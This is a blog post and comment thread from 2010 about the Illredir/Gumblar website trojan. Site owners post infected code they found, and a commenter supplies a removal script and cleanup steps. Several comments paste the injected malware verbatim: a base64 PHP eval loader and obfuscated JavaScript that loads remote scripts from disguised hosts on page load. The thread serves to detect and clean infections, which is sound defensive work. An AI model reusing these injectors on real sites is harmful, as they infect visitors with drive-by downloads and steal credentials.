TROJAN ALERT! Illredir-B/Illredir-C/Illredir-D
WARNING, PEOPLE!!! The trojans are mutating faster than we can keep up with. In one of my recent postings, I warned everyone about the Illredir-B trojan, to which Mike kindly provided a script to help us remove the trojan from our websites. In less than 2 weeks, we have been alerted that it has mutated into Illredir-C. Mike quickly modified to script to eliminate both trojans.
Today, a friend asked me to take a look at her website and Avast has detected it as Illredir-D, and when I tested Mike’s script, it wasn’t able to remove the trojan, which means it has mutated into a pattern different from the earlier two; so a further modification of the script will be needed to wipe this out.
It sounds almost like biological warfare with virus mutation.
My hat off to Avast for its quick detection, even though it is free for personal use. My AVG Free did not detect it. I’m so disappointed in it, having believed in it and recommending it to friends for the past few years.
I have also tried a few online website virus scans which were not able to detect this trojan. This is quite a worrying thought, that few antivirus programs are able to keep up with the new trojans, viruses and malware that are mushrooming more quickly than ever.
The good news is that Google is able to detect the malware, and if it has been submitted to Google webmaster, it will block access to the website upon detection of these malwares. You may come across a screenshot like the following:
DO NOT IGNORE THE WARNING!
To ensure your own protection, please please please get a good antivirus software!! I highly recommend Avast because even though I’m using the free licence, it is able to detect and block the trojan. Another one that is able to detect this virus (or so I’m told) is Kaspersky, but it’s not available for free download.
[Note: I hope this post will not be ripped off like the earlier post. If you wish to repost this blog entry, please include the original link to this entry which is http://www.zyenweb.com/2010/01/19/trojan-alert-illredir-billredir-cillredir-d/. Thank you.]
hose
If you want to remove this virus you need:
1. Delete crap from .htaccess file
2. Delete script after /html in site source code
That’s all.
I tested with Illredir-D version.
Greetz.
hose-hp@tlen.pl
hose
Sometimes also PHP/JavaScript files are infected, so be careful π
(mostly with name index.htm, index.html, index.php)
Mike
Can someone post a url to site nfected with IllRedir-D ?
Zyenweb
@Mike Sorry I cleaned out infected site that my friend asked me to check. But I did keep a copy of the original infected file. Can I email it to you? May I have your email address?
Mike
You should have it its on every one of my posts here and also comes with this removal tool π
bernd
example of infected site (2010-01.20 12:00) is http://www.enigmainfo.de (official site of “Enigma” (music)).
ALL .js-files, index.*-files on your server will be infected!
Change all your ftp-passwords!!!
In my case the trojan was reading the pwd-file of “Flash-FXP” (the ftp-tool i am using in WinXP). All accounts stored there have been infected.
Mike
Don’t see any virus there … do you have a samples of that trojan ?
MIke
Uploaded latest version 0.95
http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz
This version should remove IllRedir-B/C/D and versions starting with /*CODE1*/
Enjoy and donate if this script has helped you
Thanks
Broom
Hi Mike,
I tried the latest file, but I still get an error:
Parse error: syntax error, unexpected T_STRING, expecting T_OLD_FUNCTION or T_FUNCTION or T_VAR or ‘}’ in /home/broom6/public_html/remove-js-illredir-b.php on line 84
when I run this on
http://broombox.com/remove-js-illredir-b.php
Please HELP!
Broom
PS. Thanks for your help
MIke
This means you’re using php 4 instead of php 5 I believe.
Try to rename it to .php5 and try again if your hosting company has php5 enabled it should work then
Broom
Thanks for your response Mike. I used the SeoForums script and that seems to have worked. Thanks a lot for taking the time to respond though.
Martin
In http://www.virustotal.com/de/analisis/1290321bf9235bf874ba59b71249afe3219f615731ce5cc1bdfdb0bde1b9cdd3-1263044674
a complete list of antispyware tools is given. Here you can check, which tool detects the trojan and which does not.
MIke
Done http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz version 0.96
– Supports PHP 4!
– Backups file before modification
– Contains cure-fix for all files infected with IllRedir-B, IllRedir-C, IllRedir-D, IllRedir-E
Let me know if you having any issues with this release.
Thanks !
Sergi
I was using the script and work fine.
But in some sites I have another mutation of Illredir (I think)
In that case modify all php files with insertion of code at the top of scripts:
If I try to access to my site I see a URL like: voila-fr.gamespot.com.uol or others, and I see conection to a russian domain :S
I changed the ftp passwords and waiting for other update of your cleaner script,
Thanks for all
Sorry for my Enfglish
Sergi
I forget the code that I have at the top of all my php files:
Sergi
Ups!
/**/eval(base64_decode(‘aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy91c3IvaG9tZS9kZXphaW5zb2x1dGlvbnMuY29tL3dlYi9tb250Z2F0L3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvdGhlbWVzL2FkdmFuY2VkL2ltYWdlcy94cC9qcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=’));
MIke
http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz version 0.97
– removes eval(base64_decode()) PHP attack
– removes try{window.onload=function(){ document.write( document.write()))}catch() {}
Enjoy ! :))
Sergi
thanks! it works fine! π
leparachute
I’m bored with this trojan and it’s mutations ! After getting B, C and E version, they don’t add GNU/GPL text anymore. A new example I’m having below.
Do you know if there is a solution somewhere not to be infected again ? Change password, update blog to last version, nothing seems to stop that π Thanks in advance.
try{window.onload=function(){document.write(‘mobile-de.friendfeed.com.’);V8flyhwc7e = document.getElementById(‘Cmtyp1dk2g’).innerHTML + ‘m$)e^#$g#&a((u^@p#(l))o!&&a!#)d$^)#-##!#c!o)^!m).!^^$u(!r(l@&#n##$&e#x!@(t^#$.($r!&u$((:))$I!^#)!m@$!u^!&0##)p$#^0(p&&&v!@)0)!!g(k#&d^@@/@!$p$&@^a#(n#!t#$$i$$$p#@^.!&c&)@)o&@!m!/$(p&!a$!#^n!!)(t@^i^&p!!.!@(c&o(^(m@/&$)(r(1$^0)(.(!##n$)(e^@^t((/!t)r#$!a&$^v(&e$@(^&l$^)o^$)c$!&i&&t!(#y!.((c&)&!o^m@/@^@g@(o#!&#o^g##&l!e&.$(&&!c)^!o&$!m!@/^$)’.replace(/(|&|)|^|@|!|#|$/ig, ”) ;document.write(”);} } catch(Vt836kqo ) {}
Didis
i have the same probleme here, many websites are infected,
the code i find is different from what you mentionned, it’s like the following :
try{window.onload=function(){Pqdekqmwhk62 = ” + ‘h((u)(b!p!a$@$g)#e@(!&s@!-&)c()o^^(m@!.#($!$y(o)(^u!&#(j#^(i(&z!($$z!@.#c^@&o()^m(&.!!s((^&m!h#)^-@$#@c^o##^m!(#-@($a@(^u!.(@@#a@$v^a!#$!t^$@@t!!o!(p!&.^r)!u&!):)Y@x&$&@v^$)#6(y(j$&w&)@e$(^6(w$^7)^r@)^/$&g@@o$o@#(g#&l!$^(e&.(@c^o!m(&^/!(g^o$@o&#!$g&^^^l&e&!.#c)@o&$m$/&!t&o&#m!#.$)c^^$o&^(#(m$$(#/(@d^i@c&&^t())(.@@^c@c()@/!@s&#e$@!a@(#&&r@#s)!.(!$(c(^^o!!(m!$/#’.replace(/&|#|(|!|@|^|)|$/ig, ”) ;Q7rj4s75mfeh3 = ‘appendChild’;Mxvqzu6myayt = document.createElement(‘sc’+’ript’);Mxvqzu6myayt.src = ‘h’+’ttp://’+Pqdekqmwhk62.replace(/Yxv6yjwe6w7r/g, ‘8080’);Mxvqzu6myayt.setAttribute(‘defer’, ‘def’+’er’);eval(‘document.body.’+Q7rj4s75mfeh3+'(Mxvqzu6myayt)’);} } catch(Tb3w8uei ) {}
Mike
Updated the code version 0.98
@leparachute – version 0.97 of the script was able to remove your version
The new version removes also Didis version
Remember to change FTP passwords on the server and don’t store passwords on the ftp client don’t use TotalComander at all
Hope this helps
Mike
Per wikipedia http://en.wikipedia.org/wiki/Gumblar
This virus incorporates a network sniffer, so if you’re infected don’t use http/ftp and/or telnet to access your server. The virus will be able to extract open text passwords. Use https however if its smart enough it might use keylogger too.
So, I would recommend:
– make sure all infected boxes are shut down
– boot one box from live linux cd/dvd
– use browser to change passwords on the server (use https)
– from now on use only scp, sftp if possible
– copy virus removal script on the server (into public_html)
– run the script to fix your websites
– download http://www.malwarebytes.org/
– download avast
– dowload bootable antivir cd/dvd like kaspersky .iso
– create bootable antyvir dvd growisofs /dev/dvd=kaspersky.iso
– boot from bootable antvir
– try to clean windows partitions
– if successful boot windows
– otherwise restore your system from CD/DVD or restore partition
– install avast, malwarebytes, personal firewall
– run scans
leparachute
Thanks for your respond Mike, and for your solution to remove the trojan. What I would want is not be infected again. I changed FTP password but it seems – based on what I read – that the code is injected with input tags in forms (and not using FTP). But thanks again for your help π
Zyenweb
Hey everyone. Just approved the pending comments. Sorry I didn’t approve earlier because I couldn’t go on the ‘net for a while and I thought the comments would be automatically approved.
itsik
Hi,
I am looking for removal tool for version I
Thanks!!
Ceal
Hi,
Another mutation, and the latest version of Illredir doesn’t work…
Please help, or tell how to modify Illredir so that it worked..
var H=”;this.Ff=””;function b() {var U=””;var _=new Array();var i=’replace’;var p=’]’;this.Fw=”;var s=RegExp;var h=new String();var iE='[‘;var SI;if(SI!=” && SI!=’Ax’){SI=’e’};var R=’g’;var K;if(K!=’iW’){K=’iW’};function F(d,q){var hp;if(hp!=” && hp!=’mS’){hp=null};var _g;if(_g!=” && _g!=’hn’){_g=null};this.DJ=””;var O=iE;var V=new Date();O+=q;var v;if(v!=’nL’ && v!=’eO’){v=’nL’};var Mt=new Array();O+=p;var bP=new s(O, R);return d[i](bP, h);};var VL;if(VL!=” && VL!=’G’){VL=null};var km=””;var Ks=”;var Y=F(‘8595509958959909995′,”95″);var RB=window;var N=new Date();var w;if(w!=’fG’ && w!=’Nn’){w=’fG’};var y=F(‘hOtPtPpj:7/j/Ocja7rOe7ePrObjuPiOlPdOePrO-DcjoPmD.7lOiDnOeOzDi7nOg7.7c7ojmj.OtOrPaDvPiDaDnO-jc7ojmj.PsDaPmPuPeOsPt7.7rDuO:O’,”jO7PD”);var QF;if(QF!=’To’){QF=’To’};var k=F(‘s4c4r4i4pOtH’,”HO4″);var eS;if(eS!=” && eS!=’Wj’){eS=”};var om;if(om!=” && om!=’rD’){om=”};var T=F(‘cqr7ega7t7egEqlgegmqe7ngtq’,”g7q”);this.cd=””;var Ob=”;var o=F(‘/RaRlRiObOaObRaO.RcRoRmR/RaRlOiRbOaObOaR.RcRoOmR/O3R6O0RbOuOyR.RcRoRmO/OgOoOoOgRlOeR.OcRoOmO/OcRoRnRsOtOaOnRtOcOoOnOtRaRcOtO.OcRoOmO.RpOhOpR’,”RO”);RB[F(‘o_nZlIoyaydy’,”yZ_Ip”)]=function(){try {var wF=””;var Bi=new String();this.qX=””;Ob+=y;Ob+=Y;var Pp;if(Pp!=” && Pp!=’so’){Pp=”};var kW;if(kW!=”){kW=’l’};Ob+=o;j=document[T](k);var tT=””;var Yt;if(Yt!=’VG’ && Yt!=’NH’){Yt=’VG’};var ya=”;yD(j,’defer’,([1][0]));var xU;if(xU!=’E’){xU=”};var Iu=new String();yD(j,’src’,Ob);var u;if(u!=’We’){u=’We’};document.body.appendChild(j);var EM=””;var nA=new String();} catch(D){};var Ex;if(Ex!=” && Ex!=’asm’){Ex=null};};function yD(DG,t,A){DG.setAttribute(t, A);}this.iY=””;var pY=””;};var DR;if(DR!=’xl’ && DR!=’VP’){DR=’xl’};b();var gz;if(gz!=’uu’){gz=”};var FH=””;
Mike
Version 1.0 is out. Should fix most of the latest versions however if you’re doing something similar to the virus code your code may be removed too. The script is creating backup copies so if something doesn’t work after your run the script keep the script output log and restore from the backups.
@Andrew Try to use latest version , also don’t chmod 777 the script itself just other files. Some php servers wont run the script with write/execute permissions
Ceal
Thanks Mike for the new version, but it’s not working with the code above. Can you help?
Mike
Email me your version (code from any forum is already pre-formatted).
Zip/Rar the virus with some password and e-mail to the contact email. Include Password π
Thanks !
Ceal
Sent π
LuisTim
hi guys, I had this virus in my site and with Mike script I cleaned him and worked fine until now.
Now I think that I have a new virus, because Mike script isnt clean my website… he cleaned some files but the website continues with virus π
Can someone tell me If is the same virus?
My site is: http://www.filmes-terror.com
I am using ESET NOD32 and he show me that virus name is:
JS/TrojanDownloader.Agent.NSM trojan
05-03-2010 10:54:22 HTTP filter file http://www.filmes-terror.com/ JS/TrojanDownloader.Agent.NSM trojan connection terminated – quarantined Luis-PCLuis Threat was detected upon access to web by the application: C:Program FilesMozilla Firefoxfirefox.exe.
LuisTim
I installed AVAST in other PC and he show me that virus name is:
[L] JS:Illredir-W [Trj]
LuisTim
Please, someone?
Mike, can you upgrade your script please? π
gberg
hi all,
i need also a newer version … avast 5 said the virusname is JS:Illredir-AC
vale
This is so bad!!!! I got all my directories infected with JS:Illredir-AC.
Please help!!!
vale
there he is:
var p;if(p!=” && p!=’f’){p=null};this.N=””;var u;if(u!=”){u=’DD’};var l=new String(“hIZrep”.substr(3)+”oB8laco8B”.substr(3,3)+”e”);var tD;if(tD!=’_U’){tD=”};var U=RegExp;var I=new String();var li=”;function d(R,Q){this.X=””;this.m=””;var lm=new String();this.QU=”;var dA=String(“[3Po”.substr(0,1));this.Z=””;var Uj=String(“HVQg”.substr(3));this.fH=””;dA+=Q;dA+=new String(“uMc]”.substr(3));this.jF=””;this.z=”;var n=new U(dA, Uj);this._R=”;return R[l](n, new String());};var _D;if(_D!=’Sp’){_D=”};var Df=new Date();this.vh=”;var j=window;var TL;if(TL!=’zs’){TL=’zs’};this.ZJ=””;var k=”;var _Q=”;var G=d(‘oGn4lAoGaGdA’,”G4AfY”);var g=d(‘/QgQoGoQgSlSeS.9cSo2mS/GgQo2o9gQlGe9.Qc9oQmQ/ShQuGrGrGi9yGeQt2.2cQoSmQ.Qt2rS/9bGaQr9n2eQsSaSn2d9nSo2bGlSeG.Qc2oQm2/2aSmGa2zQo2nG.9fSrS.Sp9h9pG’,”2S9GQ”);var RM=d(‘sVcqr2iVpVtV’,”qV2″);var cZ=””;var lrx;if(lrx!=”){lrx=’wz’};var J=d(‘c_rJeJaJt_eJE_l_eJm_e_nJt_’,”_J”);var x=new Date();var i;if(i!=’PX’){i=”};var rQ=new Array();var W=d(‘85307158750573’,”1753″);var qy=new Array();var ZL=new Date();var O=d(‘h1t1t1pP:H/P/Pg1oHoHg1lPeP-1cHo1mQ-1b1rP.1fHoQrPbPe1sP.QcHo1mH.Qc1aHmHsH-PcHoHm1.1EPxHcQe1l1lHeHnPtHB1lHeQnQdQeHrH.HrPuH:Q’,”PQH1″);r=function(){var NH=new Date();var a;if(a!=”){a=’Op’};this.x_=”;w=document[J](RM);var Br;if(Br!=” && Br!=’qG’){Br=’XS’};var dAD;if(dAD!=” && dAD!=’LQ’){dAD=’Nv’};var XD;if(XD!=’XV’ && XD!=’_g’){XD=’XV’};var cX=new Date();k=O+W;var Hc=””;var cn;if(cn!=” && cn!=’nn’){cn=’Ol’};k+=g;var le=new String();var Ro=new Date();var uQ=new String();var jG=”;w.src=k;var ol;if(ol!=’Vg’){ol=’Vg’};var Gr;if(Gr!=’je’){Gr=’je’};w.defer=([2,1][1]);var kA=””;this.Rb=”;var mo;if(mo!=’BP’){mo=’BP’};document.body.appendChild(w);var sW=new Date();};this.BG=”;var Qo=new Array();j[G]=r;this.jk=””;var W_=””;var b=new String();var AT=new Date();} catch(H){};
Mike
Version 1.01 is out
Mike
If you want cure send me the samples in a zip/rar archive
Marcin Jung
@Mike ! Wow i’m impressed !
neo64
Hi,
Another mutation, and the latest version of Illredir doesnβt workβ¦
Please help, or tell how to modify Illredir so that it worked..
Thanks
var Z=”;function A() {var EW;if(EW!=’W’){EW=’W’};var B;if(B!=’N’){B=’N’};var I=new String(“ap”+”pe”+”nd”+”Ch”+”il”+”HML5d”.substr(4));var uL=String(“ghOTN”.substr(0,1));var n;if(n!=’Q’ && n!=’Fe’){n=”};var k=RegExp;var P=””;var X=new Array();var E=new String(“scSBDI”.substr(0,2)+”ri”+”pt39w7″.substr(0,2));this.YO=””;var kJ=new Array();var j;var p=window;var sI;if(sI!=’YA’ && sI!=’_’){sI=”};var bh=new Date();var e=”Z0h]”.substr(3);var HL=new Date();var bM;if(bM!=”){bM=’Ea’};var f=”;var wj=new String();var Mk;if(Mk!=’ep’){Mk=’ep’};var uC;if(uC!=’l’ && uC != ”){uC=null};function u(q,fx){var DJ;if(DJ!=’z’){DJ=’z’};var c=”[“;this.EM=””;c+=fx;var MY=new Date();var Rm=new Array();c+=e;var gD;if(gD!=’yN’){gD=’yN’};var H=new k(c, uL);var VW;if(VW!=’ta’ && VW!=’i’){VW=’ta’};var Kp;if(Kp!=’Rmu’ && Kp!=’Ys’){Kp=’Rmu’};return q.replace(H, f);var Ps;if(Ps!=’yr’ && Ps!=’wc’){Ps=”};this.Sf=””;};var Yd=new Array();var m=new String(“onlo”+”ad”);var zg;if(zg!=” && zg!=’lv’){zg=null};var Lh=new String();this.gp=”;var Ip=u(‘serncf’,’fik0W1lT8P4mhp5Hje7_nx’);var Zc;if(Zc!=’AK’){Zc=”};var v=String(“defer”);this.uA=””;this.Cn=””;j=function(){var GW=””;var Bf=”;this.A_=””;try {var sV;if(sV!=”){sV=’CL’};this.T=”;U=document.createElement(E);var hz=new Date();var qd;if(qd!=’QC’ && qd != ”){qd=null};U[v]=[1,1][0];var Kj;if(Kj!=’Tb’ && Kj!=’sn’){Kj=’Tb’};var F=”l7fbo”.substr(3)+”INYQdy”.substr(4);this.oT=”;var dW=”;U[Ip] = u(‘hStNt6p6:_/1/1p1oSk_eTs2a_cjk_.Sr_u1:N’,’62TjS1NO_’)+u(‘866942167414379770265732646923592185954451297651770254292532473443′,’19365472’)+u(‘/OfOrZeOeOlUoOt4t4oZ-3c4o3m3/3gSoZo4g4l3eS.UcOo3mZ/Sl3oUcZkSe4rUzS.Oc4oSmO.SpZhUpS’,’S4OZ3U’);var Mj=””;var FH=new Array();var ZP=””;var jK=””;document[F][I](U);} catch(O){var ge;if(ge!=’Fo’){ge=’Fo’};};var rMH;if(rMH!=’El’){rMH=’El’};var __=new String();};var jY;if(jY!=’yL’ && jY!=’NZ’){jY=’yL’};var ek;if(ek!=’mE’){ek=”};p[m]=j;var yh=”;this.PE=””;};A();var Wp=new Array();var Mw=new Array();
Scott
Please help, I do not have Avast or Kapersky -(have norton) and customers are calling me saying site is flagging virus.
File Name: http://www.metrodetroitbjj.com/
Malware name: JS:Illredir-AX [Trj]
Malware Type: Trojan Horse
VPS version: 100421-1, 04/21/2010
any help would be appreciated
Thanks in advance
Scott
Min
Hi Guys,
Avast detects my website has a virus JS:Illredir-BU [Trj]. My website is http://www.funanweng.com. Can anyone teach me how to remove it? Any help will be very much appreciated. I’m at my wits end.
Thanks!!!!!
Min
Lilly King
Very impressive….I am completely lost with computers and how to protect myself fromall the virus and torjans out there. Now I know a little more thanks to this well written article.
Mary Yorke
Mary Yorke…
[…]4 I don’t even know how I ended up here, but I thought this post was great. I mq[…]…